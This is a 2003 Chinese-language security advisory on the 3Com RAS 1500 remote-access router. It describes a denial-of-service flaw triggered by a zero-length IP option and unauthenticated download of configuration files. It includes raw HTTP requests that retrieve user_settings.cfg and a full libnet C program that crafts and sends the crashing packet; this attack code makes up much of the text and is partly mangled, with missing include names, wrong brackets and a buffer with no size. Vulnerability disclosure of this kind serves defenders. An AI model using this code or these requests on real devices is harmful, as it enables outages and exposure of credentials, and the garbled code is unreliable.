积极预防 及时发现
快速响应 力保恢复
3com RAS 1500 存在DoS/信息泄露缺陷 (Hardware,缺陷)
发布时间:2003-03-27 信息来源:管理员

涉及程序: 3com SuperStack II Remote Access System 1500 X2.0.10版 描述: 3com RAS 1500 存在DoS/信息泄露缺陷 详细: 3com SuperStack II Remote Access System 1500是一款telco设备,能使用BRI-ISDN/Analog访问dialin用户。该设备存在两个缺陷,一个是DoS缺陷,能导致系统崩溃;另一个能阅读配置文件。 1、远程DoS缺陷:远程攻击者通过发送精心构造的恶意信息包,将ip选择len领域设置为零,能使RAS 1500 (路由器)崩溃。 2、阅读配置文件:匿名用户能使用RAS 1500上的WEB界面阅读配置和系统文件: GET /download.htm HTTP/1.0 HTTP/1.0 401 Unauthorized WWW-Authenticate: Basic realm=\"RAS1500\" Content-Type: text/html Server: Allegro-Software-RomPager/2.10 GET /user_settings.cfg HTTP/1.0 HTTP/1.0 200 OK Content-Type: multipart Date: Mon, 25 May 1998 00:26:38 GMT Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT Content-Length: 1258 Server: Allegro-Software-RomPager/2.10 <..> user_setting.cfg文件的内容。 RAS 1500 的download.htm文件用于管理配置文件和系统软件,并且需要HTTP basic授权。但是,系统图形文件和配置文件不受HTTP授权保护。 利用该缺陷远程恶意用户能导致RAS 1500 - Router Unit崩溃,当攻击者破坏访问口令时,能读取并且更改RAS配置。 攻击方法: DoS攻击示例代码: #include #include #include #include #define OPT_LEN 4 void usage() { printf("Args: \n"); printf("-s \n"); printf("-d \n"); } int main(int argc,char *argv<>) { char a; int sock,r; u_long src; u_long dst; char pktbuf ; char payload<>="ABCDEFGHIJKLMNOPRST"; u_char options<4>; struct ipoption ipopt; bzero(options,OPT_LEN); while((a=getopt(argc,argv,"d:s:h?"))!=EOF) { switch(a) { case `h` : { usage(); exit(1); } case `s` : { src=libnet_name_resolve(optarg,0); break;} case `d` : { dst=libnet_name_resolve(optarg,0); break;} } } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock<0) { perror(\"socket\"); exit(1); } libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf); memcpy(ipopt.ipopt_list, options, OPT_LEN); *(ipopt.ipopt_list) = 0xe4; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; *(ipopt.ipopt_list+1) = 0; r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf); if (r <0) { libnet_close_raw_sock(sock); printf(\"Error ip options insertion failed\\n\"); exit(1); } r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload)); if (r<0) { libnet_close_raw_sock(sock); printf(\"Error write_ip \\n\"); exit(1); } libnet_close_raw_sock(sock); return 0; } 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.3com.com/